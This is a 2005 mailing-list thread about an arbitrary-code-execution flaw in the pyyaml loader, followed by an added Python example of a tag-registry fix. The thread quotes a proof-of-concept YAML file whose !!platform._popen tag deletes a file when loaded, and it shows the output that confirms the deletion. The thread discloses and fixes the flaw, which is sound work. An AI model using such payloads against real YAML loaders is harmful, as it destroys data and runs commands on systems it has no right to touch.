From: Seth de l'I. <set...@ge...> - 2005-01-13 00:02:22
Hello,

I've been trying to take a look at the security issues raised in this thread on the python mailing list:

http://www.gossamer-threads.com/lists/python/python/352547?do=post_view_threaded#352547

I think my recent modifications to pyyaml[1] (removing all exec and eval statements and directly parsing escape sequences in double quoted strings) should address the arbitrary code execution vulnerabilities described here:

http://www.gossamer-threads.com/lists/python/python/352612?do=post_view_threaded#352612

The above post also includes this recipe for an exploit:

    [Andrew-Dalkes-Computer:~/cvses/pyyaml/trunk] dalke% cat rmfile.yaml
    --- !!platform._popen
    bufsize: ~
    mode: r
    pipe: ~
    tmpfile: delete_this_file.txt
    % ls -l delete_this_file.txt
    -rw-r--r--  1 dalke  staff  28 19 Sep 23:00 delete_this_file.txt
    % python
    Python 2.4a2 (#1, Aug 29 2004, 22:30:12)
    [GCC 3.3 20030304 (Apple Computer, Inc. build 1495)] on darwin
    Type "help", "copyright", "credits" or "license" for more information.
    >>> import yaml
    >>> yaml.loadFile("rmfile.yaml").next()
    <platform._popen instance at 0x8b940>
    >>> ^D
    % ls -l delete_this_file.txt
    ls: delete_this_file.txt: No such file or directory
    %

I was unable to recreate this with the SHowell code. The author of that post checked code out of SVN, so I assume it came from Tim's code base at pollination.net (the SVN archive is spitting out errors so I couldn't check it out myself).

If you're around Tim, did you make any changes that might have created this vulnerability? I don't see any case where the __init__ function of a class would be called automagically. It looks to me like data gets copied into the object's __dict__ and we're all done.

Thanks,
Seth

[1] http://ubertechnique.com/seth/pyyaml/pyyaml-0.32.3
    GNU Arch http://ubertechnique.com/seth/arch/ category pyyaml
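The mechanism behind the recipe above, as an added example that is not code from pyyaml, from Tim's code base, or from anyone in this thread: a loader that resolves a document tag like `!!platform._popen` to any importable `module.Class`, then copies the mapping into the instance's `__dict__` without ever calling `__init__`, still hands the document author a live object of that class, whose methods and finalizer run later. The mitigation is to construct objects only from an explicit registry of tags the application expects. The `Tracked` class, `SAMPLE_DOC`, the registry and the function names are all constructed for this example; no YAML is parsed, the "documents" are already-parsed dicts.

```python
"""Added example: why skipping __init__ is not a safety boundary, and how a
tag registry closes the hole. Not code from pyyaml or from this thread."""
import importlib

# Constructed sample: a parsed YAML mapping, as a loader would hand it over.
# "tag" names a class by dotted path; "fields" are the mapping's entries.
SAMPLE_DOC = {"tag": "platform._popen",
              "fields": {"bufsize": None, "mode": "r",
                         "pipe": None, "tmpfile": "delete_this_file.txt"}}

# Side channel used by the demo class to show when its code actually runs.
FINALIZER_LOG = []


class Tracked:
    """Constructed demo class: records whether __init__ ran and, like
    platform._popen, does its work in a finalizer rather than in __init__."""

    def __init__(self):
        self.init_ran = True

    def __del__(self):
        FINALIZER_LOG.append(getattr(self, "name", "<unnamed>"))


def construct_unrestricted(tag, fields):
    """The risky pattern: any importable module.Class is fair game.
    __init__ is never called and the fields are just copied into __dict__,
    yet the resulting object belongs to the document-chosen class."""
    modname, _, clsname = tag.rpartition(".")
    cls = getattr(importlib.import_module(modname), clsname)
    obj = object.__new__(cls)   # skips __init__, as described in the thread
    obj.__dict__.update(fields)
    return obj


def construct_registered(tag, fields, registry):
    """Hardened pattern: only tags present in an explicit registry are
    constructed, and construction goes through the class's own __init__.
    (A production loader would also validate field names and types.)"""
    if tag not in registry:
        raise ValueError(f"unregistered tag {tag!r}")
    obj = registry[tag]()
    obj.__dict__.update(fields)
    return obj


# Constructed allow-list: the only tag this application agrees to build.
SAFE_REGISTRY = {"Tracked": Tracked}


def load_safely(doc, registry=SAFE_REGISTRY):
    """Returns the constructed object, or None when the tag is not allowed."""
    try:
        return construct_registered(doc["tag"], doc["fields"], registry)
    except ValueError:
        return None


def init_skipped_demo():
    """Shows that the object built without __init__ still carries the
    class's methods: its finalizer runs as soon as it is collected.
    Returns (init_ran, finalizer_log)."""
    obj = construct_unrestricted(f"{__name__}.Tracked", {"name": "from-doc"})
    init_ran = getattr(obj, "init_ran", False)   # False: __init__ never ran
    del obj   # CPython refcounting runs __del__ here
    return init_ran, list(FINALIZER_LOG)


if __name__ == "__main__":
    print("registry rejects sample doc:", load_safely(SAMPLE_DOC) is None)
    print("init skipped / finalizer ran:", init_skipped_demo())
```

The unrestricted resolver is the shape of loader the exploit recipe relies on: nothing in the document triggers `__init__`, but the tag alone decides which class's `__del__` fires when the instance is dropped. With the registry in place the same document is refused before any class is looked up.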
From: Tim P. <ti...@po...> - 2005-01-13 09:25:30
On Wed, 2005-01-12 at 16:02 -0800, Seth de l'Isle wrote:
> If you're around Tim, did you make any changes that might have created
> this vulnerability? I don't see any case where the __init__ function of
> a class would be called automagically. It looks to me like data gets
> copied into the object's __dict__ and we're all done.

I'll check the svn repository and give you access Seth... I don't have time to do too much on it at the moment but I'll help as much as possible.

ahh just checked the website.. I think our trac was updated but obviously hadn't been migrated through to the pyyaml site.. what a mess. It will be fixed soon :-)

Tim